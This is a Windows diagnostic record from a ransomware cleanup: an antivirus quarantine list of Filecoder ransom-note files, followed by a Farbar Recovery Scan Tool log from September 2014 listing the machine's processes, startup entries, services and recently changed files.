C:\ProgramData\Skype\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\ProgramData\Skype\Plugins\Plugins\F57B48ADF2224F088EDD1A2B9BAD84E8\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Apple Computer\iTunes\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\ehome\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\ehome\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\ehome\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Internet Explorer\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\LocalMLS\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\LocalMLS\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Media Player\Art Cache\LocalMLS\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Messenger\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Messenger\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Messenger\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Outlook\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Outlook\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Outlook\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Deleted Items\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Deleted Items\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Deleted Items\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Drafts\DECRYPT_INSTRUCTION.HTML Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Drafts\DECRYPT_INSTRUCTION.TXT Win32/Filecoder.CR trojan deleted - quarantined
C:\Users\hesperia\AppData\Local\Microsoft\Windows Live Mail\Iinet.net ( d12\Drafts\DECRYPT_INSTRUCTION.URL Win32/Filecoder.CR.Gen trojan deleted - quarantined
 
 
 
 
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 10-09-2014
Ran by hesperia (administrator) on HESPERIA-PC on 13-09-2014 09:48:43
Running from E:\
Platform: Microsoft Windows 7 Home Premium  (X86) OS Language: English (United States)
Internet Explorer Version 9
Boot Mode: Normal
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Microsoft Corporation) C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
(Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TosCoSrv.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TECO\TecoService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\Power Saver\TPwrMain.exe
(Advanced Micro Devices Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe
(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\ipoint.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(CANON INC.) C:\Program Files\Canon\MyPrinter\BJMYPRT.EXE
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe
(ATI Technologies Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\NDSTray.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\ConfigFree\CFSwMgr.exe
(TOSHIBA Corporation) C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\wuauclt.exe
(TOSHIBA CORPORATION) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtSrv.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtMng.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosA2dp.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtHid.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtHSP.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosAVRC.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosOBEX.exe
(TOSHIBA CORPORATION.) C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtProc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [StartCCC] => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-03-16] (Advanced Micro Devices, Inc.)
HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe [496184 2010-03-23] (Conexant Systems, Inc.)
HKLM\...\Run: [TPwrMain] => C:\Program Files\TOSHIBA\Power Saver\TPwrMain.EXE [480608 2009-11-06] (TOSHIBA Corporation)
HKLM\...\Run: [00TCrdMain] => C:\Program Files\TOSHIBA\FlashCards\TCrdMain.exe [742712 2010-03-04] (TOSHIBA Corporation)
HKLM\...\Run: [TWebCamera] => C:\Program Files\TOSHIBA\TOSHIBA Web Camera Application\TWebCamera.exe [2454840 2010-02-24] (TOSHIBA CORPORATION.)
HKLM\...\Run: [IntelliPoint] => c:\Program Files\Microsoft IntelliPoint\ipoint.exe [1797008 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [QuickTime Task] => C:\Program Files\QuickTime\QTTask.exe [421888 2010-11-29] (Apple Inc.)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [421160 2010-12-13] (Apple Inc.)
HKLM\...\Run: [CanonMyPrinter] => C:\Program Files\Canon\MyPrinter\BJMyPrt.exe [2508104 2009-11-02] (CANON INC.)
HKLM\...\Run: [CanonSolutionMenu] => C:\Program Files\Canon\SolutionMenu\CNSLMAIN.exe [767312 2009-09-04] (CANON INC.)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [284440 2011-10-17] (Intel Corporation)
HKLM\...\Run: [ToshibaServiceStation] => C:\Program Files\TOSHIBA\TOSHIBA Service Station\ToshibaServiceStation.exe [1295736 2011-02-11] (TOSHIBA Corporation)
HKLM\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-09] (Adobe Systems Incorporated)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems Incorporated)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth Manager.lnk
ShortcutTarget: Bluetooth Manager.lnk -> C:\Program Files\TOSHIBA\Bluetooth Toshiba Stack\TosBtMng.exe (TOSHIBA CORPORATION.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com.au/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/
SearchScopes: HKCU - {F4ED0519-C584-4DDA-BE93-FA0B93D040F6} URL = 
BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO: Canon Easy-WebPrint EX BHO -> {3785D0AD-BFFF-47F6-BF5B-A587C162FED9} -> C:\Program Files\Canon\Easy-WebPrint EX\ewpexbho.dll (CANON INC.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)
BHO: TOSHIBA Media Controller Plug-in -> {F3C88694-EFFA-4d78-B409-54B7B2535B14} -> C:\Program Files\TOSHIBA\TOSHIBA Media Controller Plug-in\TOSHIBAMediaControllerIE.dll (<TOSHIBA>)
BHO: Adblock Plus for IE Browser Helper Object -> {FFCB3198-32F3-4E8B-9539-4324694ED664} -> C:\Program Files\Adblock Plus for IE\AdblockPlus32.dll (Adblock Plus)
Toolbar: HKLM - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
Toolbar: HKCU - Canon Easy-WebPrint EX - {759D9886-0C6F-4498-BAB6-4A5F47C6C72F} - C:\Program Files\Canon\Easy-WebPrint EX\ewpexhlp.dll (CANON INC.)
DPF: {7530BFB8-7293-4D34-9923-61A11451AFC5} http://download.eset.com/special/eos/OnlineScanner.cab
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files\Bonjour\mdnsNSP.dll [152864] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
 
FireFox:
========
FF Plugin: @Apple.com/iTunes,version=1.0 -> C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @canon.com/EPPEX -> C:\Program Files\Canon\Easy-PhotoPrint EX\NPEZFFPI.DLL (CANON INC.)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MIF5BA~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 AgereModemAudio; C:\Program Files\LSI SoftModem\agrsmsvc.exe [14336 2009-03-28] (LSI Corporation)
S3 cfWiMAXService; C:\Program Files\TOSHIBA\ConfigFree\CFIWmxSvcs.exe [185712 2010-01-29] (TOSHIBA CORPORATION)
S3 ConfigFree Service; C:\Program Files\TOSHIBA\ConfigFree\CFSvcs.exe [46448 2009-03-11] (TOSHIBA CORPORATION)
S3 MSSQL$MSSMLBIZ; c:\Program Files\Microsoft SQL Server\MSSQL.2\MSSQL\Binn\sqlservr.exe [29293408 2010-12-10] (Microsoft Corporation)
S4 MSSQLServerADHelper; c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe [44384 2010-12-10] (Microsoft Corporation)
R3 TMachInfo; C:\Program Files\TOSHIBA\TOSHIBA Service Station\TMachInfo.exe [54136 2011-02-11] (TOSHIBA Corporation)
R2 TOSHIBA eco Utility Service; C:\Program Files\TOSHIBA\TECO\TecoService.exe [189808 2010-03-17] (TOSHIBA Corporation)
S3 TOSHIBA HDD SSD Alert Service; C:\Program Files\TOSHIBA\TOSHIBA HDD SSD Alert\TosSmartSrv.exe [111960 2010-02-06] (TOSHIBA Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 amdkmdag; C:\windows\System32\DRIVERS\atipmdag.sys [5340160 2010-03-15] (ATI Technologies Inc.)
R3 CnxtHdmiAudService; C:\windows\System32\drivers\CHDMI32.sys [516152 2010-03-06] (Conexant Systems Inc.)
R3 PGEffect; C:\windows\System32\DRIVERS\pgeffect.sys [24064 2009-06-23] (TOSHIBA Corporation)
U5 AppMgmt; C:\windows\system32\svchost.exe [20992 2009-07-14] (Microsoft Corporation)
R3 catchme; \??\C:\Users\hesperia\AppData\Local\Temp\catchme.sys [X]
U3 mbr; \??\C:\ComboFix\mbr.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-13 09:10 - 2014-09-13 09:10 - 00000000 ____D () C:\Program Files\ESET
2014-09-13 09:04 - 2014-09-13 09:15 - 231030439 _____ () C:\Users\hesperia\Downloads\Windows6.1-KB947821-v33-x86.msu
2014-09-13 09:00 - 2014-09-13 09:14 - 563934504 _____ (Microsoft Corporation) C:\Users\hesperia\Downloads\windows6.1-KB976932-X86.exe
2014-09-13 08:53 - 2014-09-13 08:53 - 00002092 _____ () C:\Users\hesperia\Desktop\Rkill.txt
2014-09-13 08:52 - 2014-09-13 08:52 - 00000000 ____D () C:\Users\hesperia\Documents\Bluetooth
2014-09-13 08:50 - 2014-09-13 08:50 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 08:48 - 2014-09-13 08:48 - 00007466 _____ () C:\ComboFix.txt
2014-09-13 08:24 - 2014-09-13 08:24 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-13 00:12 - 2014-09-13 08:48 - 00000000 ____D () C:\Qoobox
2014-09-13 00:12 - 2014-09-13 00:31 - 00000000 ____D () C:\windows\erdnt
2014-09-13 00:12 - 2011-06-26 14:45 - 00256000 _____ () C:\windows\PEV.exe
2014-09-13 00:12 - 2010-11-08 01:20 - 00208896 _____ () C:\windows\MBR.exe
2014-09-13 00:12 - 2009-04-20 12:56 - 00060416 _____ (NirSoft) C:\windows\NIRCMD.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00518144 _____ (SteelWerX) C:\windows\SWREG.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00406528 _____ (SteelWerX) C:\windows\SWSC.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00098816 _____ () C:\windows\sed.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00080412 _____ () C:\windows\grep.exe
2014-09-13 00:12 - 2000-08-31 08:00 - 00068096 _____ () C:\windows\zip.exe
2014-09-13 00:11 - 2014-09-13 00:11 - 05577449 ____R (Swearware) C:\Users\hesperia\Downloads\ComboFix.exe
2014-09-12 09:46 - 2014-09-12 09:46 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-10 18:08 - 2014-09-05 09:42 - 00444416 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-09-10 18:08 - 2014-09-05 09:38 - 00303104 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-09-10 17:34 - 2014-09-10 17:35 - 00002441 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:35 - 00001955 _____ () C:\Users\Public\Desktop\Adobe Reader 9.lnk
2014-09-10 17:34 - 2014-09-10 17:34 - 00000000 ____D () C:\Program Files\Adobe
2014-09-09 15:25 - 2014-09-13 08:17 - 00042790 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-09 15:24 - 2014-09-13 09:48 - 00000000 ____D () C:\FRST
2014-09-09 15:24 - 2014-09-13 08:17 - 00023631 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-09 15:23 - 2014-09-09 15:23 - 01097728 _____ (Farbar) C:\Users\hesperia\Downloads\FRST.exe
2014-09-09 15:12 - 2014-09-09 15:15 - 05185536 _____ (AVAST Software) C:\Users\hesperia\Downloads\aswmbr.exe
2014-09-09 14:47 - 2014-09-09 14:47 - 00001103 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00001091 _____ () C:\Users\Public\Desktop\TeamViewer 6.lnk
2014-09-09 14:47 - 2014-09-09 14:47 - 00000000 ____D () C:\Program Files\TeamViewer
2014-09-09 14:44 - 2014-09-09 14:44 - 00000000 ____D () C:\Program Files\Adblock Plus for IE
2014-09-09 14:41 - 2014-09-12 13:10 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-09 14:41 - 2014-09-09 14:41 - 00113880 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\48230029.sys
2014-09-09 14:41 - 2014-09-09 14:41 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-09 14:41 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-09-12 13:10 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-09 14:40 - 2014-09-12 12:59 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-09 14:40 - 2014-09-09 14:40 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-09 14:40 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mwac.sys
2014-09-09 14:33 - 2014-09-09 15:11 - 00000000 ____D () C:\Users\hesperia\Downloads\backups
2014-09-09 14:30 - 2014-09-09 14:35 - 00000000 ____D () C:\AdwCleaner
2014-09-09 14:28 - 2014-09-12 12:58 - 00000000 ____D () C:\windows\ERUNT
2014-09-09 14:24 - 2014-09-09 14:24 - 00388608 _____ (Trend Micro Inc.) C:\Users\hesperia\Downloads\HijackThis.exe
2014-09-08 18:32 - 2014-09-08 18:33 - 00232208 _____ () C:\windows\Minidump\090814-36613-01.dmp
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-09-13 09:48 - 2014-09-09 15:24 - 00000000 ____D () C:\FRST
2014-09-13 09:46 - 2010-12-18 19:09 - 00000000 ____D () C:\Users\hesperia\AppData\Local\VirtualStore
2014-09-13 09:45 - 2010-12-21 13:59 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Apple Computer
2014-09-13 09:45 - 2010-11-03 09:33 - 00000000 ____D () C:\ProgramData\Skype
2014-09-13 09:45 - 2010-11-03 09:02 - 00000000 ____D () C:\ProgramData\Norton
2014-09-13 09:40 - 2013-04-27 13:08 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2014-09-13 09:15 - 2014-09-13 09:04 - 231030439 _____ () C:\Users\hesperia\Downloads\Windows6.1-KB947821-v33-x86.msu
2014-09-13 09:14 - 2014-09-13 09:00 - 563934504 _____ (Microsoft Corporation) C:\Users\hesperia\Downloads\windows6.1-KB976932-X86.exe
2014-09-13 09:10 - 2014-09-13 09:10 - 00000000 ____D () C:\Program Files\ESET
2014-09-13 09:03 - 2010-11-03 08:45 - 02071459 _____ () C:\windows\WindowsUpdate.log
2014-09-13 08:54 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-13 08:54 - 2009-07-14 12:34 - 00016080 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-13 08:53 - 2014-09-13 08:53 - 00002092 _____ () C:\Users\hesperia\Desktop\Rkill.txt
2014-09-13 08:52 - 2014-09-13 08:52 - 00000000 ____D () C:\Users\hesperia\Documents\Bluetooth
2014-09-13 08:51 - 2010-12-18 19:10 - 00000000 ____D () C:\Users\hesperia\AppData\Local\Toshiba
2014-09-13 08:51 - 2010-11-03 09:00 - 00000000 ____D () C:\ProgramData\Toshiba
2014-09-13 08:51 - 2009-07-14 12:39 - 00145192 _____ () C:\windows\setupact.log
2014-09-13 08:50 - 2014-09-13 08:50 - 00110296 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 08:48 - 2014-09-13 08:48 - 00007466 _____ () C:\ComboFix.txt
2014-09-13 08:48 - 2014-09-13 00:12 - 00000000 ____D () C:\Qoobox
2014-09-13 08:47 - 2009-07-14 10:04 - 00000215 _____ () C:\windows\system.ini
2014-09-13 08:42 - 2012-04-24 14:31 - 00001945 _____ () C:\windows\epplauncher.mif
2014-09-13 08:24 - 2014-09-13 08:24 - 00000000 ____D () C:\windows\system32\SPReview
2014-09-13 08:17 - 2014-09-09 15:25 - 00042790 _____ () C:\Users\hesperia\Downloads\Addition.txt
2014-09-13 08:17 - 2014-09-09 15:24 - 00023631 _____ () C:\Users\hesperia\Downloads\FRST.txt
2014-09-13 07:47 - 2009-07-14 12:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2014-09-13 07:46 - 2010-12-19 11:01 - 00686528 _____ () C:\windows\PFRO.log
2014-09-13 00:31 - 2014-09-13 00:12 - 00000000 ____D () C:\windows\erdnt
2014-09-13 00:31 - 2009-07-14 10:37 - 00000000 ___RD () C:\Users\Public
2014-09-13 00:11 - 2014-09-13 00:11 - 05577449 ____R (Swearware) C:\Users\hesperia\Downloads\ComboFix.exe
2014-09-13 00:09 - 2010-07-07 09:15 - 00857936 _____ () C:\windows\system32\PerfStringBackup.INI
2014-09-12 15:13 - 2010-12-29 12:17 - 00003368 _____ () C:\Users\hesperia\Documents\HIGHGATE_ 11_28 RWAR MEMORIAL DEDICATION - SAT 29 OCT.eml
2014-09-12 15:13 - 2010-12-29 12:16 - 00006159 _____ () C:\Users\hesperia\Documents\failure notice.eml
2014-09-12 15:10 - 2010-12-29 12:16 - 00265897 _____ () C:\Users\hesperia\Documents\Invites.eml
2014-09-12 13:10 - 2014-09-09 14:41 - 00000000 ____D () C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2014-09-12 13:10 - 2014-09-09 14:40 - 00000000 ____D () C:\Users\hesperia\Desktop\mbar
2014-09-12 12:59 - 2014-09-09 14:40 - 00075480 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\mbamchameleon.sys
2014-09-12 12:58 - 2014-09-09 14:28 - 00000000 ____D () C:\windows\ERUNT
2014-09-12 09:49 - 2011-02-23 10:13 - 00000000 ____D () C:\Users\hesperia\AppData\Local\CrashDumps
